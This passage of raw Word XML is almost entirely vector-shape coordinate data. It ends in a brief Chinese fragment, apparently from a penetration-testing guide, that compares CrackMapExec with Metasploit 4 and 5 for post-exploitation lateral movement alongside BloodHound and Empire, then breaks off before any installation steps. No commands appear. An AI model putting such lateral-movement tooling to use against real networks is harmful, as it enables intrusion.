,8623,4075,8623,4080,8623,4086,8623,4091,8623,4096,8623,4102,8623,4107,8623,4113,8623,4118,8623,4124,8623,4130,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8624,4136,8624,4136,8624,4136,8624,4136,8624,4136,8624,4136,8624,4136,8624,4136,8624,4136,8625,4136,8625,4136,8625,4136,8625,4136,8625,4136,8626,4136,8626,4136,8626,4136,8627,4136,8627,4136,8627,4136,8628,4136,8628,4136,8629,4136,8629,4136,8630,4136,8630,4136,8631,4136,8632,4136,8632,4136,8633,4136,8634,4136,8635,4136,8635,4136,8636,4136,8637,4136,8638,4136,8639,4136,8640,4136,8641,4136,8642,4136,8643,4136,8645,4136,8646,4136,8647,4136,8649,4136,8650,4136,8651,4136,8653,4136,8654,4136,8656,4136,8658,4136,8659,4136,8661,4136,8663,4136,8665,4136,8667,4136,8669,4136,8671,4136,8673,4136,8675,4136,8678,4136,8680,4136,8682,4136,8685,4136,8687,4136,8690,4136,8692,4136,8695,4136,8698,4136,8701,4136,8704,4136,8707,4136,8710,4136,8713,4136,8716,4136,8720,4136,8723,4136,8727,4136,8730,4136,8734,4136,8737,4136,8741,4136,8745,4136,8749,4136,8753,4136,8757,4136,8762,4136,8766,4136,8770,4136,8775,4136,8779,4136,8784,4136,8789,4136,8794,4136,8799,4136,8804,4136,8809,4136,8814,4136,8819,4136,8825,4136,8830,4136,8836,4136,8842,4136,8848,4136,8854,4136,8860,4136,8866,4136,8872,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4135,8878,4135,8878,4135,8878,4135,8878,4135,8878,4135,8878,4135,8878,4134,8878,4134,8878,4134,8878,4134,8878,4133,8878,4133,8878,4133,8878,4132,8878,4132,8878,4131,8878,4131,8878,4130,8878,4130,8878,4129,8878,4129,8878,4128,8878,4128,8878,4127,8878,4126,8878,4126,8878,4125,8878,4124,8878,4123,8878,4122,8878,4121,8878,4120,8878,4119,8878,4118,8878,4117,8878,4116,8878,4115,8878,4114,8878,4112,8878,4111,8878,4110,8878,4108,8878,4107,8878,4105,8878,4104,8878,4102,8878,4100,8878,4099,8878,4097,8878,4095,8878,4093,8878,4091,8878,4089,8878,4087,8878,4085,8878,4083,8878,4081,8878,4078,8878,4076,8878,4074,8878,4071,8878,4068,8878,4066,8878,4063,8878,4060,8878,4058,8878,4055,8878,4052,8878,4049,8878,4045,8878,4042,8878,4039,8878,4036,8878,4032,8878,4029,8878,4025,8878,4021,8878,4018,8878,4014,8878,4010,8878,4006,8878,4002,8878,3998,8878,3994,8878,3989,8878,3985,8878,3980,8878,3976,8878,3971,8878,3966,8878,3962,8878,3957,8878,3952,8878,3946,8878,3941,8878,3936,8878,3930,8878,3925,8878,3919,8878,3914,8878,3908,8878,3902,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8877,3896,8877,3896,8877,3896,8877,3896,8877,3896,8876,3896,8876,3896,8876,3896,8875,3896,8875,3896,8875,3896,8874,3896,8874,3896,8874,3896,8873,3896,8873,3896,8872,3896,8871,3896,8871,3896,8870,3896,8869,3896,8869,3896,8868,3896,8867,3896,8866,3896,8866,3896,8865,3896,8864,3896,8863,3896,8862,3896,8861,3896,8860,3896,8858,3896,8857,3896,8856,3896,8855,3896,8853,3896,8852,3896,8850,3896,8849,3896,8847,3896,8846,3896,8844,3896,8842,3896,8841,3896,8839,3896,8837,3896,8835,3896,8833,3896,8831,3896,8829,3896,8827,3896,8824,3896,8822,3896,8820,3896,8817,3896,8815,3896,8812,3896,8809,3896,8807,3896,8804,3896,8801,3896,8798,3896,8795,3896,8792,3896,8789,3896,8785,3896,8782,3896,8779,3896,8775,3896,8772,3896,8768,3896,8764,3896,8761,3896,8757,3896,8753,3896,8749,3896,8745,3896,8740,3896,8736,3896,8732,3896,8727,3896,8722,3896,8718,3896,8713,3896,8708,3896,8703,3896,8698,3896,8693,3896,8688,3896,8682,3896,8677,3896,8671,3896,8666,3896,8660,3896,8654,3896,8648,3896,8642,3896,8636,3896,8630,3896,8623e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:241.500pt;margin-top:651.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4830,13030" coordsize="130,270">
        <v:shape style="position:absolute;left:4830;top:13030;width:130;height:270" coordorigin="4830,13030" coordsize="130,270" path="m4856,13051l4856,13051,4856,13051,4856,13051,4856,13051,4856,13051,4856,13051,4856,13051,4856,13051,4856,13051,4856,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4858,13051,4858,13051,4858,13051,4858,13051,4858,13051,4858,13051,4859,13051,4859,13051,4859,13051,4859,13051,4860,13051,4860,13051,4860,13051,4860,13051,4861,13051,4861,13051,4861,13051,4862,13051,4862,13051,4863,13051,4863,13051,4863,13051,4864,13051,4864,13051,4865,13051,4865,13051,4866,13051,4866,13051,4867,13051,4868,13051,4868,13051,4869,13051,4870,13051,4870,13051,4871,13051,4872,13051,4873,13051,4873,13051,4874,13051,4875,13051,4876,13051,4877,13051,4878,13051,4879,13051,4880,13051,4881,13051,4882,13051,4883,13051,4884,13051,4885,13051,4887,13051,4888,13051,4889,13051,4890,13051,4892,13051,4893,13051,4894,13051,4896,13051,4897,13051,4899,13051,4900,13051,4902,13051,4903,13051,4905,13051,4907,13051,4908,13051,4910,13051,4912,13051,4914,13051,4916,13051,4918,13051,4919,13051,4921,13051,4924,13051,4926,13051,4928,13051,4930,13051,4932,13051,4934,13051,4937,13051,4939,13051,4941,13051,4944,13051,4946,13051,4949,13051,4951,13051,4954,13051,4957,13051,4959,13051,4962,13051,4965,13051,4968,13051,4971,13051,4974,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13052,4977,13052,4977,13052,4977,13052,4977,13052,4977,13053,4977,13053,4977,13053,4977,13054,4977,13054,4977,13054,4977,13055,4977,13055,4977,13056,4977,13056,4977,13057,4977,13057,4977,13058,4977,13058,4977,13059,4977,13060,4977,13060,4977,13061,4977,13062,4977,13063,4977,13063,4977,13064,4977,13065,4977,13066,4977,13067,4977,13068,4977,13070,4977,13071,4977,13072,4977,13073,4977,13074,4977,13076,4977,13077,4977,13079,4977,13080,4977,13082,4977,13083,4977,13085,4977,13087,4977,13088,4977,13090,4977,13092,4977,13094,4977,13096,4977,13098,4977,13100,4977,13103,4977,13105,4977,13107,4977,13109,4977,13112,4977,13114,4977,13117,4977,13120,4977,13122,4977,13125,4977,13128,4977,13131,4977,13134,4977,13137,4977,13140,4977,13144,4977,13147,4977,13150,4977,13154,4977,13157,4977,13161,4977,13165,4977,13168,4977,13172,4977,13176,4977,13180,4977,13185,4977,13189,4977,13193,4977,13197,4977,13202,4977,13207,4977,13211,4977,13216,4977,13221,4977,13226,4977,13231,4977,13236,4977,13241,4977,13247,4977,13252,4977,13258,4977,13263,4977,13269,4977,13275,4977,13281,4977,13287,4977,13293,4977,13299,4977,13306,4977,13306,4977,13306,4977,13306,4977,13306,4977,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4975,13306,4975,13306,4975,13306,4975,13306,4975,13306,4975,13306,4974,13306,4974,13306,4974,13306,4974,13306,4973,13306,4973,13306,4973,13306,4973,13306,4972,13306,4972,13306,4972,13306,4971,13306,4971,13306,4970,13306,4970,13306,4970,13306,4969,13306,4969,13306,4968,13306,4968,13306,4967,13306,4966,13306,4966,13306,4965,13306,4965,13306,4964,13306,4963,13306,4963,13306,4962,13306,4961,13306,4960,13306,4960,13306,4959,13306,4958,13306,4957,13306,4956,13306,4955,13306,4954,13306,4953,13306,4952,13306,4951,13306,4950,13306,4949,13306,4948,13306,4946,13306,4945,13306,4944,13306,4943,13306,4941,13306,4940,13306,4939,13306,4937,13306,4936,13306,4934,13306,4933,13306,4931,13306,4930,13306,4928,13306,4926,13306,4925,13306,4923,13306,4921,13306,4919,13306,4917,13306,4915,13306,4913,13306,4911,13306,4909,13306,4907,13306,4905,13306,4903,13306,4901,13306,4899,13306,4896,13306,4894,13306,4892,13306,4889,13306,4887,13306,4884,13306,4882,13306,4879,13306,4876,13306,4874,13306,4871,13306,4868,13306,4865,13306,4862,13306,4859,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13305,4856,13305,4856,13305,4856,13305,4856,13305,4856,13305,4856,13305,4856,13305,4856,13304,4856,13304,4856,13304,4856,13304,4856,13304,4856,13303,4856,13303,4856,13303,4856,13302,4856,13302,4856,13302,4856,13301,4856,13301,4856,13300,4856,13300,4856,13299,4856,13299,4856,13298,4856,13297,4856,13297,4856,13296,4856,13295,4856,13294,4856,13294,4856,13293,4856,13292,4856,13291,4856,13290,4856,13289,4856,13288,4856,13287,4856,13286,4856,13284,4856,13283,4856,13282,4856,13281,4856,13279,4856,13278,4856,13276,4856,13275,4856,13273,4856,13271,4856,13270,4856,13268,4856,13266,4856,13264,4856,13262,4856,13260,4856,13258,4856,13256,4856,13254,4856,13252,4856,13249,4856,13247,4856,13244,4856,13242,4856,13239,4856,13237,4856,13234,4856,13231,4856,13228,4856,13225,4856,13222,4856,13219,4856,13216,4856,13213,4856,13209,4856,13206,4856,13203,4856,13199,4856,13195,4856,13192,4856,13188,4856,13184,4856,13180,4856,13176,4856,13172,4856,13168,4856,13163,4856,13159,4856,13154,4856,13150,4856,13145,4856,13140,4856,13135,4856,13130,4856,13125,4856,13120,4856,13115,4856,13110,4856,13104,4856,13099,4856,13093,4856,13087,4856,13081,4856,13075,4856,13069,4856,13063,4856,13057,4856,13051e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:271.500pt;margin-top:651.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5430,13030" coordsize="130,270">
        <v:shape style="position:absolute;left:5430;top:13030;width:130;height:270" coordorigin="5430,13030" coordsize="130,270" path="m5457,13051l5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5458,13051,5458,13051,5458,13051,5458,13051,5458,13051,5458,13051,5458,13051,5458,13051,5459,13051,5459,13051,5459,13051,5459,13051,5460,13051,5460,13051,5460,13051,5460,13051,5461,13051,5461,13051,5461,13051,5462,13051,5462,13051,5462,13051,5463,13051,5463,13051,5464,13051,5464,13051,5465,13051,5465,13051,5466,13051,5466,13051,5467,13051,5467,13051,5468,13051,5469,13051,5469,13051,5470,13051,5471,13051,5471,13051,5472,13051,5473,13051,5474,13051,5475,13051,5475,13051,5476,13051,5477,13051,5478,13051,5479,13051,5480,13051,5481,13051,5482,13051,5483,13051,5484,13051,5486,13051,5487,13051,5488,13051,5489,13051,5491,13051,5492,13051,5493,13051,5495,13051,5496,13051,5497,13051,5499,13051,5501,13051,5502,13051,5504,13051,5505,13051,5507,13051,5509,13051,5510,13051,5512,13051,5514,13051,5516,13051,5518,13051,5520,13051,5522,13051,5524,13051,5526,13051,5528,13051,5530,13051,5532,13051,5535,13051,5537,13051,5539,13051,5542,13051,5544,13051,5546,13051,5549,13051,5552,13051,5554,13051,5557,13051,5560,13051,5562,13051,5565,13051,5568,13051,5571,13051,5574,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13052,5577,13052,5577,13052,5577,13052,5577,13052,5577,13053,5577,13053,5577,13053,5577,13054,5577,13054,5577,13054,5577,13055,5577,13055,5577,13056,5577,13056,5577,13057,5577,13057,5577,13058,5577,13058,5577,13059,5577,13060,5577,13060,5577,13061,5577,13062,5577,13063,5577,13063,5577,13064,5577,13065,5577,13066,5577,13067,5577,13068,5577,13070,5577,13071,5577,13072,5577,13073,5577,13074,5577,13076,5577,13077,5577,13079,5577,13080,5577,13082,5577,13083,5577,13085,5577,13087,5577,13088,5577,13090,5577,13092,5577,13094,5577,13096,5577,13098,5577,13100,5577,13103,5577,13105,5577,13107,5577,13109,5577,13112,5577,13114,5577,13117,5577,13120,5577,13122,5577,13125,5577,13128,5577,13131,5577,13134,5577,13137,5577,13140,5577,13144,5577,13147,5577,13150,5577,13154,5577,13157,5577,13161,5577,13165,5577,13168,5577,13172,5577,13176,5577,13180,5577,13185,5577,13189,5577,13193,5577,13197,5577,13202,5577,13207,5577,13211,5577,13216,5577,13221,5577,13226,5577,13231,5577,13236,5577,13241,5577,13247,5577,13252,5577,13258,5577,13263,5577,13269,5577,13275,5577,13281,5577,13287,5577,13293,5577,13299,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5576,13306,5576,13306,5576,13306,5576,13306,5576,13306,5576,13306,5576,13306,5576,13306,5576,13306,5576,13306,5575,13306,5575,13306,5575,13306,5575,13306,5575,13306,5574,13306,5574,13306,5574,13306,5574,13306,5573,13306,5573,13306,5573,13306,5573,13306,5572,13306,5572,13306,5572,13306,5571,13306,5571,13306,5570,13306,5570,13306,5569,13306,5569,13306,5568,13306,5568,13306,5567,13306,5567,13306,5566,13306,5566,13306,5565,13306,5564,13306,5564,13306,5563,13306,5562,13306,5561,13306,5561,13306,5560,13306,5559,13306,5558,13306,5557,13306,5556,13306,5555,13306,5554,13306,5553,13306,5552,13306,5551,13306,5550,13306,5549,13306,5548,13306,5547,13306,5546,13306,5544,13306,5543,13306,5542,13306,5540,13306,5539,13306,5538,13306,5536,13306,5535,13306,5533,13306,5531,13306,5530,13306,5528,13306,5527,13306,5525,13306,5523,13306,5521,13306,5520,13306,5518,13306,5516,13306,5514,13306,5512,13306,5510,13306,5508,13306,5506,13306,5503,13306,5501,13306,5499,13306,5497,13306,5494,13306,5492,13306,5490,13306,5487,13306,5485,13306,5482,13306,5479,13306,5477,13306,5474,13306,5471,13306,5468,13306,5466,13306,5463,13306,5460,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13305,5457,13305,5457,13305,5457,13305,5457,13305,5457,13305,5457,13305,5457,13305,5457,13304,5457,13304,5457,13304,5457,13304,5457,13304,5457,13303,5457,13303,5457,13303,5457,13302,5457,13302,5457,13302,5457,13301,5457,13301,5457,13300,5457,13300,5457,13299,5457,13299,5457,13298,5457,13297,5457,13297,5457,13296,5457,13295,5457,13294,5457,13294,5457,13293,5457,13292,5457,13291,5457,13290,5457,13289,5457,13288,5457,13287,5457,13286,5457,13284,5457,13283,5457,13282,5457,13281,5457,13279,5457,13278,5457,13276,5457,13275,5457,13273,5457,13271,5457,13270,5457,13268,5457,13266,5457,13264,5457,13262,5457,13260,5457,13258,5457,13256,5457,13254,5457,13252,5457,13249,5457,13247,5457,13244,5457,13242,5457,13239,5457,13237,5457,13234,5457,13231,5457,13228,5457,13225,5457,13222,5457,13219,5457,13216,5457,13213,5457,13209,5457,13206,5457,13203,5457,13199,5457,13195,5457,13192,5457,13188,5457,13184,5457,13180,5457,13176,5457,13172,5457,13168,5457,13163,5457,13159,5457,13154,5457,13150,5457,13145,5457,13140,5457,13135,5457,13130,5457,13125,5457,13120,5457,13115,5457,13110,5457,13104,5457,13099,5457,13093,5457,13087,5457,13081,5457,13075,5457,13069,5457,13063,5457,13057,5457,13051e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:169.500pt;margin-top:665.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3390,13310" coordsize="130,250">
        <v:shape style="position:absolute;left:3390;top:13310;width:130;height:250" coordorigin="3390,13310" coordsize="130,250" path="m3401,13321l3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3402,13321,3402,13321,3402,13321,3402,13321,3402,13321,3402,13321,3402,13321,3403,13321,3403,13321,3403,13321,3403,13321,3404,13321,3404,13321,3404,13321,3404,13321,3405,13321,3405,13321,3405,13321,3406,13321,3406,13321,3406,13321,3407,13321,3407,13321,3408,13321,3408,13321,3409,13321,3409,13321,3410,13321,3410,13321,3411,13321,3411,13321,3412,13321,3413,13321,3413,13321,3414,13321,3415,13321,3415,13321,3416,13321,3417,13321,3418,13321,3419,13321,3419,13321,3420,13321,3421,13321,3422,13321,3423,13321,3424,13321,3425,13321,3426,13321,3427,13321,3428,13321,3430,13321,3431,13321,3432,13321,3433,13321,3435,13321,3436,13321,3437,13321,3439,13321,3440,13321,3441,13321,3443,13321,3444,13321,3446,13321,3448,13321,3449,13321,3451,13321,3453,13321,3454,13321,3456,13321,3458,13321,3460,13321,3462,13321,3464,13321,3466,13321,3468,13321,3470,13321,3472,13321,3474,13321,3476,13321,3479,13321,3481,13321,3483,13321,3486,13321,3488,13321,3490,13321,3493,13321,3496,13321,3498,13321,3501,13321,3504,13321,3506,13321,3509,13321,3512,13321,3515,13321,3518,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13322,3521,13322,3521,13322,3521,13322,3521,13322,3521,13323,3521,13323,3521,13323,3521,13323,3521,13324,3521,13324,3521,13324,3521,13325,3521,13325,3521,13326,3521,13326,3521,13327,3521,13327,3521,13328,3521,13328,3521,13329,3521,13330,3521,13330,3521,13331,3521,13332,3521,13333,3521,13334,3521,13335,3521,13335,3521,13336,3521,13337,3521,13339,3521,13340,3521,13341,3521,13342,3521,13343,3521,13345,3521,13346,3521,13347,3521,13349,3521,13350,3521,13352,3521,13353,3521,13355,3521,13357,3521,13359,3521,13360,3521,13362,3521,13364,3521,13366,3521,13368,3521,13370,3521,13373,3521,13375,3521,13377,3521,13380,3521,13382,3521,13385,3521,13387,3521,13390,3521,13393,3521,13395,3521,13398,3521,13401,3521,13404,3521,13407,3521,13410,3521,13414,3521,13417,3521,13420,3521,13424,3521,13427,3521,13431,3521,13435,3521,13439,3521,13442,3521,13446,3521,13451,3521,13455,3521,13459,3521,13463,3521,13468,3521,13472,3521,13477,3521,13481,3521,13486,3521,13491,3521,13496,3521,13501,3521,13506,3521,13511,3521,13517,3521,13522,3521,13528,3521,13533,3521,13539,3521,13545,3521,13551,3521,13557,3521,13563,3521,13569,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3520,13576,3520,13576,3520,13576,3520,13576,3520,13576,3520,13576,3520,13576,3520,13576,3520,13576,3520,13576,3520,13576,3519,13576,3519,13576,3519,13576,3519,13576,3519,13576,3518,13576,3518,13576,3518,13576,3518,13576,3517,13576,3517,13576,3517,13576,3517,13576,3516,13576,3516,13576,3515,13576,3515,13576,3515,13576,3514,13576,3514,13576,3513,13576,3513,13576,3512,13576,3512,13576,3511,13576,3511,13576,3510,13576,3510,13576,3509,13576,3508,13576,3508,13576,3507,13576,3506,13576,3505,13576,3505,13576,3504,13576,3503,13576,3502,13576,3501,13576,3500,13576,3499,13576,3498,13576,3497,13576,3496,13576,3495,13576,3494,13576,3493,13576,3492,13576,3491,13576,3489,13576,3488,13576,3487,13576,3486,13576,3484,13576,3483,13576,3481,13576,3480,13576,3479,13576,3477,13576,3475,13576,3474,13576,3472,13576,3471,13576,3469,13576,3467,13576,3465,13576,3463,13576,3462,13576,3460,13576,3458,13576,3456,13576,3454,13576,3452,13576,3450,13576,3447,13576,3445,13576,3443,13576,3441,13576,3438,13576,3436,13576,3433,13576,3431,13576,3429,13576,3426,13576,3423,13576,3421,13576,3418,13576,3415,13576,3412,13576,3410,13576,3407,13576,3404,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13575,3401,13575,3401,13575,3401,13575,3401,13575,3401,13575,3401,13575,3401,13574,3401,13574,3401,13574,3401,13574,3401,13573,3401,13573,3401,13573,3401,13573,3401,13572,3401,13572,3401,13571,3401,13571,3401,13570,3401,13570,3401,13569,3401,13569,3401,13568,3401,13568,3401,13567,3401,13566,3401,13565,3401,13565,3401,13564,3401,13563,3401,13562,3401,13561,3401,13560,3401,13559,3401,13558,3401,13557,3401,13556,3401,13555,3401,13553,3401,13552,3401,13551,3401,13549,3401,13548,3401,13546,3401,13545,3401,13543,3401,13541,3401,13540,3401,13538,3401,13536,3401,13534,3401,13532,3401,13530,3401,13528,3401,13526,3401,13524,3401,13522,3401,13519,3401,13517,3401,13514,3401,13512,3401,13509,3401,13507,3401,13504,3401,13501,3401,13498,3401,13495,3401,13492,3401,13489,3401,13486,3401,13483,3401,13480,3401,13476,3401,13473,3401,13469,3401,13465,3401,13462,3401,13458,3401,13454,3401,13450,3401,13446,3401,13442,3401,13438,3401,13433,3401,13429,3401,13424,3401,13420,3401,13415,3401,13410,3401,13406,3401,13401,3401,13396,3401,13390,3401,13385,3401,13380,3401,13374,3401,13369,3401,13363,3401,13357,3401,13352,3401,13346,3401,13340,3401,13333,3401,13327,3401,13321e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:271.500pt;margin-top:665.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5430,13310" coordsize="130,250">
        <v:shape style="position:absolute;left:5430;top:13310;width:130;height:250" coordorigin="5430,13310" coordsize="130,250" path="m5442,13321l5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5443,13321,5443,13321,5443,13321,5443,13321,5443,13321,5443,13321,5443,13321,5444,13321,5444,13321,5444,13321,5444,13321,5445,13321,5445,13321,5445,13321,5445,13321,5446,13321,5446,13321,5446,13321,5447,13321,5447,13321,5447,13321,5448,13321,5448,13321,5449,13321,5449,13321,5450,13321,5450,13321,5451,13321,5451,13321,5452,13321,5452,13321,5453,13321,5454,13321,5454,13321,5455,13321,5456,13321,5456,13321,5457,13321,5458,13321,5459,13321,5460,13321,5460,13321,5461,13321,5462,13321,5463,13321,5464,13321,5465,13321,5466,13321,5467,13321,5468,13321,5469,13321,5471,13321,5472,13321,5473,13321,5474,13321,5476,13321,5477,13321,5478,13321,5480,13321,5481,13321,5482,13321,5484,13321,5485,13321,5487,13321,5489,13321,5490,13321,5492,13321,5494,13321,5495,13321,5497,13321,5499,13321,5501,13321,5503,13321,5505,13321,5507,13321,5509,13321,5511,13321,5513,13321,5515,13321,5517,13321,5520,13321,5522,13321,5524,13321,5527,13321,5529,13321,5531,13321,5534,13321,5537,13321,5539,13321,5542,13321,5545,13321,5547,13321,5550,13321,5553,13321,5556,13321,5559,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13322,5562,13322,5562,13322,5562,13322,5562,13322,5562,13323,5562,13323,5562,13323,5562,13323,5562,13324,5562,13324,5562,13324,5562,13325,5562,13325,5562,13326,5562,13326,5562,13327,5562,13327,5562,13328,5562,13328,5562,13329,5562,13330,5562,13330,5562,13331,5562,13332,5562,13333,5562,13334,5562,13335,5562,13335,5562,13336,5562,13337,5562,13339,5562,13340,5562,13341,5562,13342,5562,13343,5562,13345,5562,13346,5562,13347,5562,13349,5562,13350,5562,13352,5562,13353,5562,13355,5562,13357,5562,13359,5562,13360,5562,13362,5562,13364,5562,13366,5562,13368,5562,13370,5562,13373,5562,13375,5562,13377,5562,13380,5562,13382,5562,13385,5562,13387,5562,13390,5562,13393,5562,13395,5562,13398,5562,13401,5562,13404,5562,13407,5562,13410,5562,13414,5562,13417,5562,13420,5562,13424,5562,13427,5562,13431,5562,13435,5562,13439,5562,13442,5562,13446,5562,13451,5562,13455,5562,13459,5562,13463,5562,13468,5562,13472,5562,13477,5562,13481,5562,13486,5562,13491,5562,13496,5562,13501,5562,13506,5562,13511,5562,13517,5562,13522,5562,13528,5562,13533,5562,13539,5562,13545,5562,13551,5562,13557,5562,13563,5562,13569,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5561,13576,5561,13576,5561,13576,5561,13576,5561,13576,5561,13576,5561,13576,5561,13576,5561,13576,5561,13576,5560,13576,5560,13576,5560,13576,5560,13576,5560,13576,5559,13576,5559,13576,5559,13576,5559,13576,5558,13576,5558,13576,5558,13576,5558,13576,5557,13576,5557,13576,5557,13576,5556,13576,5556,13576,5555,13576,5555,13576,5554,13576,5554,13576,5553,13576,5553,13576,5552,13576,5552,13576,5551,13576,5551,13576,5550,13576,5549,13576,5549,13576,5548,13576,5547,13576,5546,13576,5546,13576,5545,13576,5544,13576,5543,13576,5542,13576,5541,13576,5540,13576,5539,13576,5538,13576,5537,13576,5536,13576,5535,13576,5534,13576,5533,13576,5532,13576,5531,13576,5529,13576,5528,13576,5527,13576,5525,13576,5524,13576,5523,13576,5521,13576,5520,13576,5518,13576,5516,13576,5515,13576,5513,13576,5512,13576,5510,13576,5508,13576,5506,13576,5504,13576,5503,13576,5501,13576,5499,13576,5497,13576,5495,13576,5493,13576,5491,13576,5488,13576,5486,13576,5484,13576,5482,13576,5479,13576,5477,13576,5475,13576,5472,13576,5470,13576,5467,13576,5464,13576,5462,13576,5459,13576,5456,13576,5453,13576,5451,13576,5448,13576,5445,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13575,5442,13575,5442,13575,5442,13575,5442,13575,5442,13575,5442,13575,5442,13574,5442,13574,5442,13574,5442,13574,5442,13573,5442,13573,5442,13573,5442,13573,5442,13572,5442,13572,5442,13571,5442,13571,5442,13570,5442,13570,5442,13569,5442,13569,5442,13568,5442,13568,5442,13567,5442,13566,5442,13565,5442,13565,5442,13564,5442,13563,5442,13562,5442,13561,5442,13560,5442,13559,5442,13558,5442,13557,5442,13556,5442,13555,5442,13553,5442,13552,5442,13551,5442,13549,5442,13548,5442,13546,5442,13545,5442,13543,5442,13541,5442,13540,5442,13538,5442,13536,5442,13534,5442,13532,5442,13530,5442,13528,5442,13526,5442,13524,5442,13522,5442,13519,5442,13517,5442,13514,5442,13512,5442,13509,5442,13507,5442,13504,5442,13501,5442,13498,5442,13495,5442,13492,5442,13489,5442,13486,5442,13483,5442,13480,5442,13476,5442,13473,5442,13469,5442,13465,5442,13462,5442,13458,5442,13454,5442,13450,5442,13446,5442,13442,5442,13438,5442,13433,5442,13429,5442,13424,5442,13420,5442,13415,5442,13410,5442,13406,5442,13401,5442,13396,5442,13390,5442,13385,5442,13380,5442,13374,5442,13369,5442,13363,5442,13357,5442,13352,5442,13346,5442,13340,5442,13333,5442,13327,5442,13321e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:734.400pt;width:467.400pt;height:27.6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痛风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03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CrackMapExec弥补了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MSF4下auxiliary，scanner模块下的Command执行方式，但MSF5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已解决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该问题。在MSF4下，该框架针对后渗透的横向移动经常出现，虽然MSF5已解决该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问题，但该框架在配合bloodhound与empire依然目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前有一定优势。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安装方式：from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
